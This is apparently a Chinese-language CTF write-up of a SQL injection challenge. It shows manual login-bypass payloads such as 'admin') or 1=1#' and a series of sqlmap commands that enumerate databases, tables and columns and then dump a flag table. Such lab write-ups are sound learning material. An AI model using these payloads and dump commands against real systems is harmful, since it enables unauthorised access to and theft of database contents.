遇到了sql注入的题目,记录一下sqlmap使用过程
一、手工注入测试
1、简单的万能注入先测试一下
用户名:admin') or 1=1# / admin' and 1=1 # / admin' or 1=1 # / admin' and -1=-1 ....
密码:123'
结果没测出来,也没报错,一点反应都没有
二、sqlmap工具扫描
先用sqlmap跑一下,找出注入点
1、将请求包写入1.txt,然后执行sqlmap -r 1.txt --batch
存在时间注入和联合注入,可以利用一下联合注入,但是目前不知道有哪些库和表,先查一下
2、sqlmap -r 1.txt -dbs --batch,ctftraining这个库看着比较像存着flag的数据库,先查看一下
3、sqlmap -r 1.txt -D ctftraining --tables --batch ,FLAG_TABLE这个表比较像,还是跟着感觉走,查看一下这个表
4、sqlmap -r 1.txt -D ctftraining -T FLAG_TABLE --columns --batch
5、sqlmap -r 1.txt -D ctftraining -T FLAG_TABLE -C "FLAG_COLUMN" --dump --batch ,空的,感觉错了,从数据库从头再查
6、重复步骤省略,最后在web2数据库下的flag表中发现flag字段,并且成功找到flag
就很坑,,,,,